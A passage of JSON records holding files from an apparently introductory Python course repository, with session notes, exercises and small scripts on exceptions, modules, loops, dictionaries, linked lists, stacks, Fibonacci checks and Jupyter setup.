Exception(\"previousNode is not node!!!\")\n self.previous=previousNode\n previousNode.next=self\n def add(self,newNode):\n assert type(newNode)==type(self)\n newNode.setNext(self.next)\n self.setNext(newNode)\n def printToEnd(self):\n currentNode=self\n while currentNode!=None:\n print(currentNode.data,end=\" \")\n currentNode=currentNode.next\n print()\n def delete(self):\n self.next.setPrevious(self.previous)\n # self.previous.setNext(self.next)\n def root(self):\n currentNode=self\n while currentNode.previous!=None:\n currentNode=currentNode.previous\n return currentNode\n def __len__(self):\n currentNode=self\n counter=0\n while currentNode.previous!=None:\n currentNode=currentNode.previous\n counter+=1\n\n currentNode=self\n while currentNode.next!=None:\n currentNode=currentNode.next\n counter+=1\n counter+=1\n return counter\n\nif __name__ == '__main__':\n nodes=[node(i) for i in range(10)]\n for node_,nextNode in zip(nodes,nodes[1:]):\n node_.setNext(nextNode)\n nodes[0].printToEnd()\n nodes[4].add(node(4.5))\n nodes[0].printToEnd()\n print(\"g\",len(nodes[4]))\n" }, { "alpha_fraction": 0.6819120049476624, "alphanum_fraction": 0.6966809630393982, "avg_line_length": 24.807376861572266, "blob_id": "43705ba9125af68ad95d93ec6bc61ff94d4612c2", "content_id": "d1a4427931186a1e802305293d4da98a3ffab214", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 6305, "license_type": "no_license", "max_line_length": 265, "num_lines": 244, "path": "/Session4/README.md", "repo_name": "kkasra12/pythonClass981", "src_encoding": "UTF-8", "text": "**QUESTION:** There is a list of points in Cartesian coordinates. Desired program should be able to count the number of rectangles that can be formed using those points. To simplify the question,a rectangle's edges are parallel with xor y coordinates. For instance:\n\n**Input**\n```\n0,0\n0,1\n0,2\n1,0\n1,1\n1,2\n```\n**output**\n```\n3\n```\n# Exception Handling\n\n#### Some Common Exceptions\n- **Exception** (this is what almost all the others are built off of)\n- **AttributeError** - Raised when an attribute reference or assignment fails.\n- **IOError** - Raised when an I/O operation (such as a `print` statement, the built-in `open()` function or a method of a file object) fails for an I/O-related reason, e.g.,\n“*file not found*” or “*disk full*”.\n- **ImportError** - Raised when an import statement fails to find the module definition or when a `from ... import` fails to find a name that is to be imported.\n- **IndexError** - Raised when a sequence subscript is out of range.\n- **KeyError** - Raised when a mapping (dictionary) key is not found in the set of existing keys.\n- **KeyboardInterrupt** - Raised when the user hits the interrupt key (normally\nControl-C or Delete).\n- **NameError** - Raised when a local or global name is not found.\n- **OSError** - Raised when a function returns a system-related error.\n- **SyntaxError** - Raised when the parser encounters a syntax error\n- **TypeError** - Raised when an operation or function is applied to an object of inappropriate type. The associated value is a string giving details about the type mismatch.\n- **ValueError** - Raised when a built-in operation or function receives an argument that has the right type but an inappropriate value, and the situation is not described by a more precise exception such as *IndexError*.\n- **ZeroDivisionError** - Raised when the second argument of a division or modulo operation is zero.\n\n#### try/except\n\n```python\ntry:\n print(1/0)\nexcept:\n print(\"Can not divide by zero :)\")\n```\n\n*to be more specified...*\n\n```python\ntry:\n print(1/0)\nexcept ZeroDivisionError:\n print(\"Can not divide by zero :)\")\n```\n\n**How to handle several exceptions?**\n\n```python\nnumDicts={\"zero\":0,\"one\":1,\n 'two':2,'three':3,\n 'four':4,'five':5,\n 'six':6,'seven':7,\n 'eight':8,'nine':9}\ntry:\n num1,num2=input(\"please give me two numbers to divide them: \").split(\" \")\n print(numDicts[num1]/numDicts[num2])\nexcept ZeroDivisionError:\n print(\"Can not divide by zero :)\")\nexcept KeyError:\n print(\"I do not understand that number\")\nexcept:\n print(\"Oops!!! smth bad happened :[\")\n```\n\n*or*\n\n```python\nnumDicts={\"zero\":0,\"one\":1,\n 'two':2,'three':3,\n 'four':4,'five':5,\n 'six':6,'seven':7,\n 'eight':8,'nine':9}\ntry:\n num1,num2=input(\"please give me two numbers to divide them: \").split(\" \")\n print(numDicts[num1]/numDicts[num2])\nexcept (ZeroDivisionError, KeyError):\n print(\"Please recheck what you entered :|\")\nexcept:\n print(\"Oops!!! smth bad happened :[\")\n```\n\n# Modules and Importing\n\n```python\nimport math\nprint(math.sqrt(4))\nprint(math.cos(0))\nprint(math.pi)\n```\n\n**QUESTION:** How to find all functions in a module ?\n\n#### Using from to import\n```python\nfrom math import sqrt\nprint(sqrt(4))\n# print(math.sqrt(4))\n# print(cos(60))\n# print(math.cos(60))\n# print(math.pi)\n```\n\n```python\nfrom math import sqrt,cos\nprint(sqrt(4))\n# print(math.sqrt(4))\nprint(cos(60))\n# print(math.cos(60))\n```\n\n```python\nfrom math import *\nprint(sqrt(4))\n# print(math.sqrt(4))\nprint(cos(60))\n# print(math.cos(60))\nprint(math.pi)\n```\n\n**How to change functions name?**\n\n```python\nimport tkinter as tk\n```\n\n```python\nfrom math import log as ln\nprint(ln(2.71828))\n```\n\n```python\nfrom math import log as ln,e as EulerNumber\nprint(ln(EulerNumber))\n```\n\n*lets have some fun...*\n```python\n>>> import this\nThe Zen of Python, by Tim Peters\n\nBeautiful is better than ugly.\nExplicit is better than implicit.\nSimple is better than complex.\nComplex is better than complicated.\nFlat is better than nested.\nSparse is better than dense.\nReadability counts.\nSpecial cases aren't special enough to break the rules.\nAlthough practicality beats purity.\nErrors should never pass silently.\nUnless explicitly silenced.\nIn the face of ambiguity, refuse the temptation to guess.\nThere should be one-- and preferably only one --obvious way to do it.\nAlthough that way may not be obvious at first unless you're Dutch.\nNow is better than never.\nAlthough never is often better than *right* now.\nIf the implementation is hard to explain, it's a bad idea.\nIf the implementation is easy to explain, it may be a good idea.\nNamespaces are one honking great idea -- let's do more of those!\n>>>\n```\n\n#### importing from non-global modules\n\nImagine there is a program which needs `func0` and `func1`. One simple architecture for this code can be like this:\n\n```Python\n# File name: run_me.py\ndef func0(a,b):\n pass\n\ndef func1():\n pass\n\ninput()\n# your main code goes here\nprint()\n```\n\n*or* it is much **better** to use modules and `import`\n\n```Python\n# File name: utilities.py\ndef func0(a,b):\n pass\n\ndef func1():\n pass\n```\n\n```Python\n# File name: run_me.py\nfrom utilities import func0,func1\ninput()\n# your main code goes here\nprint()\n```\n\n# if \\_\\_name__ == \"\\_\\_main__\":\n\nthink of the last example. It will be nice to have some test cases for `utilities.py`. Simply we can add some test lines at the end of `utilities.py`, but there is a problem.(!?)\n\nTo solve the problem, lets separate test cases which leads us to generate this file:\n```Python\n# File name: utilities_testCase.py\nfrom utilities import func0,func1\nprint(func0(\"aTest\",\"bTest\"))\nprint(func0(\"aAnotherTest\",\"bAnotherTest\"))\nprint(func1(\"aTest\",\"bTest\"))\nprint(func1(\"aAnotherTest\",\"bAnotherTest\"))\n```\n\n**now lets make our environment more tidy by deleting `utilities_testCase.py`:**\n\n```Python\n# File name: utilities.py\ndef func0(a,b):\n pass\n\ndef func1():\n pass\nif __name__ == '__main__':\n print(func0(\"aTest\",\"bTest\"))\n print(func0(\"aAnotherTest\",\"bAnotherTest\"))\n print(func1(\"aTest\",\"bTest\"))\n print(func1(\"aAnotherTest\",\"bAnotherTest\"))\n```\n*and also we have main file:*\n```Python\n# File name: run_me.py\nfrom utilities import func0,func1\ninput()\n# your main code goes here\nprint()\n```\n\n> NOTE: both files should be in the same folder.\n" }, { "alpha_fraction": 0.693473219871521, "alphanum_fraction": 0.7039626836776733, "avg_line_length": 17.255319595336914, "blob_id": "4e93a3e57b6139a3b74c214f192d7e6d51a6b4b1", "content_id": "2ffa5c81d528180bb001fc398f334eb3b80ec0bf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 858, "license_type": "no_license", "max_line_length": 104, "num_lines": 47, "path": "/AnswersUntilSixthSession/README.md", "repo_name": "kkasra12/pythonClass981", "src_encoding": "UTF-8", "text": "# Some discovery around jupyter\n\n## Install Theme\n### 1. Istall the theme\n```bash\n$ pip install jupytertheme\n```\n### 2. Change the theme\nto see the list of available themes:\n```bash\n$ jt -l\nAvailable Themes:\n chesterish\n grade3\n gruvboxd\n gruvboxl\n monokai\n oceans16\n onedork\n solarizedd\n solarizedl\n```\nto change the theme:\n```bash\n$ jt -t monokai\n```\n## Install some extensions\n> See [doc](https://jupyter-contrib-nbextensions.readthedocs.io/en/latest/install.html) for this section\n\n### 1. Install the python package\n```bash\n$ pip install jupyter_contrib_nbextensions\n```\n*or...*\n```bash\n$ pip3 install jupyter_contrib_nbextensions --user\n```\n\n### 2. Install javascript and css files\n```bash\n$ jupyter contrib nbextension install --user\n```\n\n### 3. Enabling/Disabling extensions\n```bash\n$ jupyter nbextension enable codefolding/main\n```\n" }, { "alpha_fraction": 0.5589606761932373, "alphanum_fraction": 0.6092604994773865, "avg_line_length": 17.193939208984375, "blob_id": "0921872f7e9186e32b04b2953742e60dd361a5cd", "content_id": "16f6f848de71b5e5566330f2768f25239ebb83c1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3002, "license_type": "no_license", "max_line_length": 111, "num_lines": 165, "path": "/Session1/README.md", "repo_name": "kkasra12/pythonClass981", "src_encoding": "UTF-8", "text": "# second Session\n\n# if - elif - else\n\nthe overall syntax is:\n```python\nif <condition0>:\n # some code goes here using proper indentation\nelif <condition1>:\n # some other code goes here\n # these codes will execute if ( ~condition0 & condition1 )\nelif <condition2>:\n # some other code goes here\n # these codes will execute if ( ~condition0 & ~condition1 & condition2 )\nelse:\n # some other code goes here\n # these codes will execute if all conditions was not true\n```\n\n## forLoop\n\noverall syntax is\n```python\nfor <var> in <iterable>:\n loop-body\n# for example:\nfor i in [1,2,3,4]:\n print(2*i)\n```\nOUTPUT:\n```\n2\n4\n6\n8\n```\n### question: print 0 to 100 ???\n```python\nfor i in range(0,100):\n print(i)\n```\n\n### question: print Fibonacci\nask a user for a number and print Fibonacci series up to that number\nFibonacci series is:\n> a[n]=a[n-1]+a[n-2]\n>\n> 1,1,2,3,5,8,13,...\n\n```python\nn=int(input())\nfib=[1,1]\nfor i in range(2,n):\n fib=fib+[fib[i-1]+fib[i-2]]\n print(fib[i],end=\" \")\nprint()\n```\n\n## break - continue - for else\nthink of a given list as `lst` print 1/x for each x in lst if x!=0 and ignore all members after a `None` member\n\n> what is None?\n>\n> None is a data that points to nothing :)\n\n```python\nlst=[1,3,4,6,8,0,None,4,5,5,3]\nans=[]\nfor i in lst:\n if i==0:\n continue\n if i==None:\n break\n ans.append(1/i)\nelse:\n print(\"this list has no None items\")\nprint(ans)\n```\n\n## while - loop\n\n### question: ask for numbers from users and sum them up until user types STOP\n\n```python\nsum=0\nwhile True:\n n=input()\n if n==\"STOP\":\n break\n sum+=int(n)\nprint(sum)\n```\n\n### question: ask a number from user and write the each digit in seperate line\n> idea\n>\n> 256=25*10+6\n>\n> 25=2*10+5\n>\n> 2=0*10+2\n\n```python\nlst=[]\nn=int(input())\nwhile n>0:\n lst.append(n%10)\n n//=10.\nprint(lst[::-1])\n```\n\nOR\n\n```python\nn=input()\nfor i in n:\n print(i)\n```\n\nLATER you can say:\n\n```python\nprint(\"\\n\".join([i for i in input()]))\n```\n\n## Dictionary\n\ndictionaries contains a ***key*** and a ***value***\n> TIP: ***key*** must be **hashable**\nthe most usable function of the dictianries is update:\n\nlook at this cammands executed in REPL\n```python\n>>> numbers={1:\"one\",2:\"two\",3:\"three\"}\n>>> print(numbers[1])\none\n>>> print(numbers[3])\nthree\n>>> details={\"name\":\"kasra\",\"age\":22,\"height\":1.8,200:500}\n>>> details['name']\n'kasra'\n>>> details.get(\"name\")\n'kasra'\n>>> details.get(\"namee\")\n>>> details.items()\ndict_items([('name', 'kasra'), ('age', 22), ('height', 1.8), (200, 500)])\n>>> details.pop(\"name\")\n'kasra'\n>>> details\n{'age': 22, 'height': 1.8, 200: 500}\n>>> details.setdefault('age',0)\n22\n>>> details\n{'age': 22, 'height': 1.8, 200: 500}\n>>> details.setdefault('age',0)\n22\n>>> details.setdefault('name','kasraaaaaa')\n'kasraaaaaa'\n>>> details\n{'age': 22, 'height': 1.8, 200: 500, 'name': 'kasraaaaaa'}\n>>> details.update({\"name\":\"kasra\",\"test\":\"testVal\"})\n\n>>> details\n{'age': 22, 'height': 1.8, 200: 500, 'name': 'kasra', 'test': 'testVal'}\n```\n" }, { "alpha_fraction": 0.7592592835426331, "alphanum_fraction": 0.7592592835426331, "avg_line_length": 26, "blob_id": "06c5404e1ab2b49c60a154b5f7e7c7e2f917bf03", "content_id": "2b87e79771e6972a9156e36ca50c24fbdd9f1d2a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 54, "license_type": "no_license", "max_line_length": 43, "num_lines": 2, "path": "/Session6/README.md", "repo_name": "kkasra12/pythonClass981", "src_encoding": "UTF-8", "text": "# Jupyter\n try installing jupyter for this session :)\n" }, { "alpha_fraction": 0.651067316532135, "alphanum_fraction": 0.6535303592681885, "avg_line_length": 24.375, "blob_id": "da37de60bb958e1b724b961f262789d502147efe", "content_id": "944d5266b9089459133c5e7824b59b125eb90c3e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1218, "license_type": "no_license", "max_line_length": 107, "num_lines": 48, "path": "/Session8/README.md", "repo_name": "kkasra12/pythonClass981", "src_encoding": "UTF-8", "text": "# Class(part2)\n\nlets make an stack...\n\n## a Simple Example\n**lets make a class**\n### what is stack ?\n\n![stack](./stack.jpg)\n\n> TIP: The initial step to make a class is defining its API *(what is API?)*\n\n### API\n\n| function/variable | arguments|returns| description |\n| :-------------: | :-------:| :---:|:--- |\n| push | value:[anytype] | `None` | pushes `value` into stack\npop|-|last item in the stack, `None` if stack is empty | removes the last item in the stack and returns it|\nlastItem|-|last item in the stack|like pop but without removing\nisEmpty|-|`True` or `False`|returns `True` if stack is empty\nsize|-| `int` |returns the number of items stored in the stack\nstr|-|?|?\neq|other stack|?|?\n\n\n**Question**\n\n1. Implement a stack class\n2. describe how to use it in other code\n\n**How to force user not to have access to main data in class?**\n\n### public, private and protected Access Modifiers\n\n**Question**\\\n define terms public, private and protected.\n\n```Python\nclass test:\n \"\"\"docstring for test.\"\"\"\n\n def __init__(self):\n self.public='public' # this is public\n self._protected=\"protected\" # this is protected\n self.__private=\"private\" # this is private\n```\n\n> NOTE: that was all joke!!! :)\n" }, { "alpha_fraction": 0.3802816867828369, "alphanum_fraction": 0.4553990662097931, "avg_line_length": 18.363636016845703, "blob_id": "9265e8e1285c13a958b6308c9a840465b3d5fd99", "content_id": "c8f8ea15c73720cfc8e81c1433eb92d38afed595", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 213, "license_type": "no_license", "max_line_length": 37, "num_lines": 11, "path": "/Session7/fastFib/regularFib.py", "repo_name": "kkasra12/pythonClass981", "src_encoding": "UTF-8", "text": "def isFib(num):\n a,b=1,1\n while b<num:\n a,b=b,a+b\n if b==num:\n return True\n return False\n\nif __name__ == '__main__':\n for i in [3,5,11,8,20,50,100,90]:\n print(isFib(i))\n" }, { "alpha_fraction": 0.643147885799408, "alphanum_fraction": 0.685662567615509, "avg_line_length": 29.28767204284668, "blob_id": "a0caec567aca3baabf4438440b71e3fd44bbb2ba", "content_id": "6609bc2af87afe798fbd7169ca71d2bcd8eb2b04", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2211, "license_type": "no_license", "max_line_length": 103, "num_lines": 73, "path": "/Session7/fastFib/speedChecker.py", "repo_name": "kkasra12/pythonClass981", "src_encoding": "UTF-8", "text": "from time import time\nfrom random import randint,gauss\nfrom fastFib import FibMaker\nfrom regularFib import isFib\nfrom collections import Counter\ntry:\n from matplotlib import pyplot as plt\n drawGraph=True\nexcept:\n print('''You dont have matplotlib!!So I cant show any graph...\ntry installing it using:\n $pip install matplotlib''')\n drawGraph=False\n# This is a Fibonacci series chose your constant wiser...\n# 1 2 3 5 8 13 21 34 55 89 144 233 377 610 987 1597 2584 4181 6765 10946 17711 28657 46368 75025 121393\n#\nTEST_SIZE=int(1e7)\nSTART_RANGE=int(1.21e5)\nEND_RANGE=int(1.22e5)\nprint('generating numbers...')\n# numbers=[randint(START_RANGE,END_RANGE) for _ in range(TEST_SIZE)]\nnumbers=[int(gauss((START_RANGE+END_RANGE)/2,(END_RANGE-START_RANGE)/12)) for _ in range(TEST_SIZE)]\nprint('numbers generated...')\nprint(f'''\\tbiggest number generated: {max(numbers)}\n\\tsmallest number generated:{min(numbers)}''')\nif drawGraph:\n numbersDest=Counter(numbers)\n ############this is not good(why?):\n #x=[i[0] for i in numbersDest.items()]\n #y=[i[1] for i in numbersDest.items()]\n ############this is much faster\n x=[]\n y=[]\n for i in numbersDest:\n x.append(i)\n y.append(numbersDest[i])\n print(\"numbers counted...\\nmaking the graph...\")\n plt.bar(x,y)\n plt.show()\nansfastFib=[]\nansreguFib=[]\nprint('...')\nfastFib=FibMaker()\nnow=time()\nfor i in numbers:\n ansfastFib.append(fastFib.isFib(i))\nfastFibTime=time()-now\nprint(f\"time elapsed for fast fib is {fastFibTime}\")\n\nnow=time()\nfor i in numbers:\n ansreguFib.append(isFib(i))\nreguFibTime=time()-now\nprint(f\"time elapsed for fast fib is {reguFibTime}\")\n\nif all([i==j for i,j in zip(ansfastFib,ansreguFib)]):\n print(\"\\tNOTE: all answers match\")\nelse:\n print(\"\\tNOTE: all answers does NOT match\")\n\nansDest=Counter(ansfastFib)\n\n# plt.bar(['True','False'],[ansDest[True],ansDest[False]],yerr=[\"sallaaam\",\"rrrr\"])\nprint(f\"number of mathed items: {ansDest[True]}\\nnumber of unmathed items: {ansDest[False]}\")\n# plt.show()\n\nfig, ax = plt.subplots()\ny=[ansDest[True],ansDest[False]]\nax.bar(['True','False'],y)\nfor index,data in enumerate(y):\n plt.text(index, 10, s=f\"{data}\")\nplt.tight_layout()\nplt.show()\n" }, { "alpha_fraction": 0.4398782253265381, "alphanum_fraction": 0.48097413778305054, "avg_line_length": 23.33333396911621, "blob_id": "67d29e5734e219040a73018532411338f5628433", "content_id": "a114c74c447d1f2e09d17ad238d67e6b85018ed4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 657, "license_type": "no_license", "max_line_length": 39, "num_lines": 27, "path": "/Session7/fastFib/fastFib.py", "repo_name": "kkasra12/pythonClass981", "src_encoding": "UTF-8", "text": "class FibMaker:\n def __init__(self):\n self.series={1,1}\n self.lastNum0=1\n self.lastNum1=1\n\n def isFib(self,num):\n if num in self.series:\n return True\n if num<self.lastNum1:\n return False\n a,b=self.lastNum0,self.lastNum1\n while b<num:\n a,b=b,a+b\n self.series.add(b)\n if b==num:\n self.lastNum0=a\n self.lastNum1=b\n return True\n self.lastNum0=a\n self.lastNum1=b\n return False\n\nif __name__ == '__main__':\n f=FibMaker()\n for i in [3,5,11,8,20,50,100,90]:\n print(f.isFib(i))\n" }, { "alpha_fraction": 0.4100106358528137, "alphanum_fraction": 0.4739084243774414, "avg_line_length": 14.145161628723145, "blob_id": "bd518ec1447f54d793ce3babb2144451427beb7a", "content_id": "575d991809a898db83e97eb1b64a6bfcc8b5e217", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1878, "license_type": "no_license", "max_line_length": 207, "num_lines": 124, "path": "/Session3/question.md", "repo_name": "kkasra12/pythonClass981", "src_encoding": "UTF-8", "text": "# Question0\nwrite a function which gets a nested list and a number. This function should search the number in the list and returns its place as sequence of indexes, also this function should returns the lists structure.\n\n **input** is a list and a number\\\n **output** must be sequence of indexes pointing to that number and the structure of nested lists.\n\n#### sampleCode\n```python\ndef listShape(lst,n):\n # blub blub blub\n pass\n\nnestedList=[\n [\n [\n [1,2],\n [3,4],\n [5,6]\n ],\n [7,8],\n [9,10,11],\n [12],\n [13,14,15]\n ],\n [\n [16],\n [17,18],\n [19,20,21],\n [\n [22],\n [\n [23,24],\n [25,26,27],\n ],\n [28]\n ],\n [29]\n ],\n [30],\n]\nprint(nestedList,15)\n```\n#### Output\n```python\n[0,4,2],\n[\n 3,\n [5,5,1],\n [\n [3,2,3,1,3],\n [1,2,3,3,1],\n [0]\n ],\n [\n [\n [2,2,2],\n [0,0],\n [0,0,0],\n [0],\n [0,0,0]\n ],\n [\n [0],\n [0,0],\n [0,0,0],\n [1,2,1],\n [0]\n ]\n ],\n [\n [\n [\n [0,0],\n [0,0],\n [0,0]\n ],\n ],\n [\n [\n [0],\n [2,3],\n [0]\n ],\n ]\n ],\n [\n [\n [\n [\n [0,0],\n [0,0,0]\n ],\n ],\n ]\n ],\n]\n```\n\n# Question1\nImplement a function which it can calculate the reverse of another function.\\\nwe know `y=f(x)` where `y` value and `f` function are available. Finding `x` is the goal.\n\n**input**\n- first input is a function\n- second one is `y` value\n- third and forth values are the ranges which contains the answer(generally, the whole function range or any sub-range of that)\n\n**output** is `x` which `y==f(x)` is **True** value.\n\n#### sampleCode\n```python\ndef f_inv(f,y,startRange,endRange):\n # blub blub blub\n pass\n\n\ng=lambda x: 2*x**2+x\nprint(f_inv(g,g(4,5),0,5))\n```\n#### output\n```\n4.5\n```\nor any number near to `4.5`\n" }, { "alpha_fraction": 0.5610211491584778, "alphanum_fraction": 0.6002490520477295, "avg_line_length": 14.90099048614502, "blob_id": "ab8cd85a5fc3f111f2c3e3d46d4855165ab751b0", "content_id": "a1d738ea4182dea79ff3323a7d0242b609170f93", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1606, "license_type": "no_license", "max_line_length": 128, "num_lines": 101, "path": "/Session1/questions.md", "repo_name": "kkasra12/pythonClass981", "src_encoding": "UTF-8", "text": "## First question\n\nthere is some numbers in first line\nthese numbers might be angles of a polygon\nThe question is to write a code to determine wheather those angles can form a polygon or not.\n\n#### input0\n> 90 45 45\n\n#### output0\n> YES\n\n#### input1\n> 90 80 100 90\n\n#### output1\n> YES\n\n#### input2\n> 90 80 80 70\n\n#### output2\n> NO\n\n**TIP**: You can split input value using `str.split()` function\n```python\n>>> a='kasra eskandari test tmp'\n>>> splitedVal=a.split(' ')\n>>> print(splitedVal)\n['kasra', 'eskandari', 'test', 'tmp']\n```\n\n**TIP**: The sum of a angles in a polygon is `180(n-2)`\n\n## Second question\n\nget an integer number `n` from user and draw two diamond with a diameter of `n` using astricks (or whatever character you like).\n\n#### input0\n> 5\n\n#### output0\n```\n * *\n *** ***\n**********\n *** ***\n * *\n```\n\n## Third question\n\nask the user for a sentence and count the occurrence of each character.\nprint each character in seperate line and leave a single space between character and the number\n\n#### input0\n> hello my name is kasra\n\n#### output0\n```\nh 1\ne 2\nl 2\no 1\n 4\nm 2\ny 1\nn 1\na 3\ni 1\ns 2\nk 1\nr 1\n```\n**TIP**: use logical `in` operator to check if a key is available in dictionary or not.\n```python\n>>> d={'a':0, 'b':2, 'f':65}\n>>> if 'a' in d:\n... print(\"YES\")\n...\nYES\n>>> if 'c' in d:\n... print(\"YES\")\n... else:\n... print(\"NO\")\n...\nNO\n>>>\n```\n## Forth question (!!HARD!!)\n\nGet a sequence of numbers from user ans store them in a list ( lets say `a` e.g. )\nfind the size of this set\n\n`{(x,y,z) : x<y<z , a[x] < a[y] < a[z] }`\n\n#### input0\n> 1 2 2 3 4\n\n#### output0\n> 6\n" }, { "alpha_fraction": 0.6532846689224243, "alphanum_fraction": 0.6551094651222229, "avg_line_length": 15.606060981750488, "blob_id": "51bfb3b390a01100defa1bdb1a38824b4f049ae7", "content_id": "2296d890cccce09235321839d9a95ecd61c95ac3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1096, "license_type": "no_license", "max_line_length": 116, "num_lines": 66, "path": "/Session2/README.md", "repo_name": "kkasra12/pythonClass981", "src_encoding": "UTF-8", "text": "# List comprehensions\n```python\nmyList=[<expresion> for <var> in <iterable>]\n```\n**is same as**:\n```python\nmyList=[]\nfor <var> in <iterable>:\n myList.append(<expresion>)\n```\n\n#### using if-statement\n```python\n[<expresion> for <var> in <iterable> if <condition>]\n```\n\n#### using if-else-statement\n```python\n[<expresion0> if <condition> else <expresion1> for <var> in <iterable>]\n```\n\n> similar methods are available for `dictionary`,`tuple` and `set`\n\n# Working around strings\n\n## join\n\n**exercise :** print a multiplication table (prefer to use just one print)\n\n> \\t and \\n can be used Tab and newLine\n\n## split\n\n## format\n\n## F-strings\n\n> Strings are immutable\n\n# Built-in function\n\n#### What is function ?\n\n#### How to use function ?\n\n#### abs\n\n#### all,any\n\n**exercise:** write a program to get a adjacency matrix and determine weather it has Eulerian path or cycle or not ?\n\n#### bin, oct, hex\n\n#### chr, ord\n\n#### max, min\n\n#### open\n\n#### zip\n\n#### enumerate\n\n**exercise:** ask the user for two strings and return their hamming distance\n\n> using three ' or \" can make a multi line string.\n" }, { "alpha_fraction": 0.6359060406684875, "alphanum_fraction": 0.6476510167121887, "avg_line_length": 14.684210777282715, "blob_id": "4fd731d649248039f4c1064343094619991fce85", "content_id": "26d92fc16a47007dc7412103e294710c6a747f12", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1788, "license_type": "no_license", "max_line_length": 92, "num_lines": 114, "path": "/Session5/README.md", "repo_name": "kkasra12/pythonClass981", "src_encoding": "UTF-8", "text": "# `os` Module\n\n- os.name\n****\n- os.environ\n- os.getenv()\n- os.putenv()\n****\n- os.chdir()\n- os.getcwd()\n****\n- os.mkdir()\n- os.rmdir()\n****\n- os.remove()\n- os.rename()\n****\n- os.walk()\n```python\nfor root, dirs, files in os.walk(path):\n print(root)\n```\n- os.path\n - basename\n - dirname\n - exists\n - isdir and isfile\n - join\n - split\n\n# `random` Module\n- choice \\\n **Question:** Roll a dice :)\n- choices\\\n **Question:** How to generate a 8 digit random password?\n- randint\\\n **Question:** Roll another dice :))\n- random\\\n **Question:** keep rolling dices :)))\n- shuffle\\\n **Question:** feel free to roll a simple dice :))))\n\n# `time` Module\n- time\n- sleep\n\n# `pickle` Module\n- dump\n- load\n\n```python\nfrom pickle import dump\n\nmyList=[1,2]\n# some codes to populate myList\n# now lets save it to use later\n\nf=open(\"myList\",'wb')\ndump(myList,f)\nf.close()\n```\n\n```python\nfrom pickle import load\nf=open(\"myList\",'rb')\nmyList=load(f)\nprint(myList)\n```\n# More Modules to Read\n- csv\n- datetime\n- urllib2\n- hashlib\n- json\n- smtplib\n\n# How to Install New Modules\n\n\nfirst of all check if you have pip or not\n```bash\n$ pip3 --version\npip 19.3.1 from /usr/local/lib/python3.6/dist-packages/pip (python 3.6)\n```\n> use `pip` if you have windows\n\n## Install pip\nto install pip, if you already don't have it:\\\n**In UNIX machines:**\n```bash\n$ sudo apt install python3-pip\n```\nor use any other package manager up to your distribution\n\n**In Windows**\n```bash\npython -m pip install pip\n```\n*or:*\n\n1. Download [get-pip.py](https://bootstrap.pypa.io/get-pip.py) to a folder on your computer.\n2. Run that file using python:\n```bash\n$ python get-pip.py\n```\n3. FINISH\n\n## How to Use It\n```bash\n$ pip3 search <package-name>\n$ pip3 install <package-name> --user\n$ pip3 list\n$ pip3 install <package-name> --upgrade\n```\n" }, { "alpha_fraction": 0.6894374489784241, "alphanum_fraction": 0.7078071236610413, "avg_line_length": 28.525423049926758, "blob_id": "a5b650ee2dd6c7154e73d51741a2326ce25d9277", "content_id": "4c1031060d30de7df7a0874e6b2604934d69c9a4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1742, "license_type": "no_license", "max_line_length": 238, "num_lines": 59, "path": "/Session9/README.md", "repo_name": "kkasra12/pythonClass981", "src_encoding": "UTF-8", "text": "# Question0\n\nimplement a bidirectional linked list :)\n\n![](Linkedlist.png)\n**API**\n\n| function/variable | description |\n| :-: |:-\ndata|the data stored in this node\nnext| points to the next node |\nprevious|points to previous node\nadd|adds a node to specific index|\ndelete|deletes current node\nroot| returns the lists root\nlen| -\nstr| -\neq| -\n\n![](Linkedlist_insert_middle.png)\n\n![](Linkedlist_deletion.png)\n\n# Question1\n\nYou are given a node that is the beginning of a linked list. This list always contains a tail and a loop.\n\nYour objective is to determine the length of the loop.\n\nin the following example the tail's size is 3 and the loop size is 11.\n```python\nnodes=[node() for i in range(14)]\nfor node, next_node in enumerate(nodes,nodes[1:]):\n node.next=next_node\nnodes[13].next=nodes[11]\n```\n\n> Use the `next` attribute to get the following node\\\n> `node.next`\n\n> Note: do NOT mutate the nodes!\n\n\n# Question2\n\nA [perfect power](https://en.wikipedia.org/wiki/Perfect_power) is a classification of positive integers:\n\n> In mathematics, a perfect power is a positive integer that can be expressed as an integer power of another positive integer. More formally, `n` is a perfect power if there exist natural numbers `m > 1`, and `k > 1` such that `m**k = n`.\n\nYour task is to check wheter a given integer is a perfect power. If it is a perfect power, return a pair `m` and `k` with `mk = n` as a proof. Otherwise return `None`.\n\n> Note: For a perfect power, there might be several pairs. For example 81 = 3^4 = 9^2, so (3,4) and (9,2) are valid solutions. However, the tests take care of this, so if a number is a perfect power, return any pair that proves it.\n\n```\nExamples\nisPP(4) => [2,2]\nisPP(9) => [3,2]\nisPP(5) => None\n```\n" }, { "alpha_fraction": 0.49221453070640564, "alphanum_fraction": 0.49913495779037476, "avg_line_length": 21.568628311157227, "blob_id": "4cfb0fccfcd45e885931f57c9c1ebed263a9a29b", "content_id": "dbe05499e5c6a9b128fdb0d8e0cf1f64fbfee24c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1156, "license_type": "no_license", "max_line_length": 50, "num_lines": 51, "path": "/Session8/stack.py", "repo_name": "kkasra12/pythonClass981", "src_encoding": "UTF-8", "text": "class stack:\n def __init__(self):\n self.values=[]\n def push(self,value):\n self.values.append(value)\n\n\n def pop(self):\n if len(self.values)==0:\n return None\n else:\n return self.values.pop(-1)\n\n def lastItem(self):\n if len(self.values)==0:\n return None\n else:\n return self.values[-1]\n def isEmpty(self):\n if 